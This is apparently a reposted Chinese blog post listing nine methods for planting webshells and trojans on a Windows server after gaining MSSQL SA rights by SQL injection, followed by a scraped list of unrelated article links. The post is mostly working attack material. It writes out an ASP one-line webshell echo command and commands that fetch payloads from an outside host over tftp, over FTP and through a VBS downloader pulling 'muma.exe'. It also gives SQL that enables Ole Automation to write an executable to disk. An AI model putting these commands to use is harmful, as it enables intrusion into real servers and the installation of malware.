刚看了一种方法,如果是注入点,利用管中窥豹以二进制的方式上传,上传的时候最好改下名,比如do.exe,上传到目标服务器可以改成do.cmd,等传上去之后用copy 命令改回来。

当然用啊d也可以上传,还有nbsi。

SA 权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。

、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<%eval request("#")%^> >d:/web/mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop "服务名"可以停掉服务。

、NBSI3。0自带文件上传功能,也可以使用。缺点速度慢。建议上传短小的WEBSHELL。

、把一句话木马与入数据库,然后利用NBSI数据库差异备份功能。

、如网站有论坛且开放上传附件功能,可直接在论坛上传文件(把WEBSHELL改成可能上传的文件类型,如JPG,GIF)

、利用NBSI等注入工具,浏览网站数据库连接文件(前提数据库和WEB在一台机器上,可利用IPCNFIG /ALL命令判断)找出SA的连接密码。利用MSSQL2000自带的事件查询分析器,连数库机器,通过浏览数据库找出后台密码,如果是MD5可利用 UPDATE语句进行更改也可利用INSERT加入一新用户,不用在爆破MD5,进入后台,寻找上传WEBSHELL方法。

、tftp命令法: TFTP [-i] host [GET | PUT] source [destination] 首先在自己的机器或已经控制的肉鸡上开TFTP服务,工具:TFTP32.EXE不错。比如:肉鸡 IP:192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令: tftp -i 192.168.1.1 get webshell.asp d:/web/webshell.asp 如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp

、ftp方法:前提是有一个可访问的外网FTP空间().命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txt
echo open www.ftp.com>ftp.TXT //连接FTP
echo username>>ftp.TXT       //输入用户名
echo password>>ftp.TXT       //输入密码
echo get webshell.asp d:/web/webshell.asp>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令

、vbs脚本方法:
利用ECHO命令写入文件: get.vbs,内容如下:
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
然后命令行下执行:cscript get.vbs http://ip/muma.exe c:/muma.exe

、start命令法,此方法不常用,但也是一种方法,
start http://ip/a.html这候a.html文件以及它包括的图片会保存在机器的,如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中。可以利用dir /s a*.jpg进行搜索。如搜索到,可以利用COPY命令复制出来。

、自然找到了一种方法很好用。

第一步先恢复

exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ole Automation Procedures',1
reconfigure

第二步

DECLARE @ObjectToken INT

EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT

EXEC sp_OASetProperty @ObjectToken, 'Type', 1

EXEC sp_OAMethod @ObjectToken, 'Open'

EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x

EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mssql.exe', 2 把16进制恢复exe 名字为 mssql

EXEC sp_OAMethod @ObjectToken, 'Close'

EXEC sp_OADestroy @ObjectToken

go

mssql.exe需要十六进制转换。用了一段vbs,代码如下。

On Error Resume Next
FilePath = Wscript.Arguments(0)
FieName = Right(FilePath, Len(FilePath) - InStrRev(FilePath, "/"))
With CreateObject("Adodb.Stream")
.Type = 1: .open: .loadfromfile FilePath: Str = .read: Sl = LenB(Str)
End With

Sll = Sl Mod 65536: Slh = Sl / 65536
With CreateObject("Scripting.FileSystemObject").OpenTextFile(FilePath & ".txt", 2, True)
.Write "0x"
For i = 1 To Sl
bt = AscB(MidB(Str, i, 1))
If bt < 16 Then .Write "0"
.Write Hex(bt)
Next
End With

用法 1.vbs 1.exe

转自:http://www.cqzh.cn/post/SA上传方法.html

转载]SA权限九种上传方法相关推荐

  1. python 文件上传 web_pythonweb自动化三种文件上传方法

    文件上传三种方式: (一)查看元素标签,如果是input,则可以参照文本框输入的形式进行文件上传 方法:和用户输入是一样的,使用send_keys 步骤:1.找到定位元素,2,输入文件路径 ele=d ...

  2. 无线水标数值如何上传服务器,一种精准上传数据的智能水表及用水量记录上传方法...

    1.一种精准上传数据的智能水表,包括计数上传模组电路板(1).齿轮组件(2).计数组件(3).叶轮组件(4):所述叶轮组件(4)位于水表内部的流道内,叶轮组件(4)向上连接驱动齿轮系组件(2),齿轮系 ...

  3. [转载]ASP.NET Core文件上传与下载(多种上传方式)

    ASP.NET Core文件上传与下载(多种上传方式) 前言 前段时间项目上线,实在太忙,最近终于开始可以研究研究ASP.NET Core了. 打算写个系列,但是还没想好目录,今天先来一篇,后面在整理 ...

  4. 前后端分离微服务管理系统项目实战SaaS-HRM项目(九)——文件上传与PDF报表入门

    文章目录 九.文件上传与PDF报表入门 1.图片上传 <1>.Data URL (1).概述 (2).入门 (3).基本原理 (4).优缺点分析 <2>.实现用户头像上传 2. ...

  5. php上传图片 中文,php图片上传方法

    php图片上传方法 发布于 2015-11-07 21:44:59 | 92 次阅读 | 评论: 0 | 来源: PHPERZ PHP开源脚本语言PHP(外文名: Hypertext Preproce ...

  6. git学习与上传方法

    git命令学习与上传方法 git命令 本地管理 远程仓库管理 分支管理.多人协作.bug分支 标签管理 参与开源项目 gitee关联库 git 特殊用法 上传提交方法 git命令 自己学习git的使用 ...

  7. java 调用 swf 文件上传_java文件上传方法

    文件上传方法(一次上传一个文件,多个文件的话,请写循环调用) Upload.uploadFile(theFile, filePath) 说明: theFile:类型是FormFile filePath ...

  8. php js 异步上传图片,javascript实现异步图片上传方法实例

    如何通过javascript写出异步图片上传?本文我们就和大家分享一些实例代码javascript实现异步图片上传.我们首先看下HTML代码实现的form提交部分.其中大家在测试的时候需要把test的 ...

  9. 【arduino】arudino开发ESP32 SPIFFS文件上传方法

    微信关注 "DLGG创客DIY" 设为"星标",重磅干货,第一时间送达. 之前发过ESP8266的SPIFFS文件及上传方法: [arduino]arudino ...

最新文章

  1. Android Studio实用插件使用
  2. c++ vector 指针
  3. 什么样的python程序员好找工作-Python学到什么程度才可以去找工作?掌握这4点足够了!...
  4. DBA(五):数据分片、Mycat服务
  5. python 中float 的语法_python语法和基本数据类型
  6. React Native 和ionic2 你选择哪一个?
  7. oracle使用sqlplus查询sql格式
  8. 微信小程序怎么取mysql_微信小程序如何加载数据库真实数据?
  9. Method-Swizzling实战-实现iOS原生网络请求性能采集
  10. java自定义异常实验总结,Java实验--自定义异常的使用
  11. 计算机英语讲课笔记02
  12. 东方智慧和西方智慧的比较
  13. 删数问题(Noip1994)
  14. 从0开始实现自动化运维工具(一)
  15. S3C2440 移植RTL8187L无线USB网卡记录(已经解决)
  16. 7-28 猴子选大王 (20分)
  17. script加密解密工具下载
  18. 最简单AS5048a模块鉴别和读取数据
  19. PMP考试 工作绩效数据 工作绩效信息 工作绩效报告 区别与联系
  20. 2022-09-12 mysql语法分析实现

热门文章

  1. 什么是CSS?你真的理解?
  2. Bash脚本教程之mktemp 命令,trap 命令
  3. 远程桌面无法找到计算机不属于指定网络,远程桌面找不到计算机
  4. mysql自增长主键_MySQL数据库8(九)列属性之主键、自增长
  5. vue.extend与vue.component的区别和联系
  6. css之absolute
  7. 关于background-*的一些属性
  8. 实现 通过数据库里一个字段值相等 则把 他合为一条数据
  9. 解决阿里云OSS跨域问题
  10. 团队作业—预则立他山之石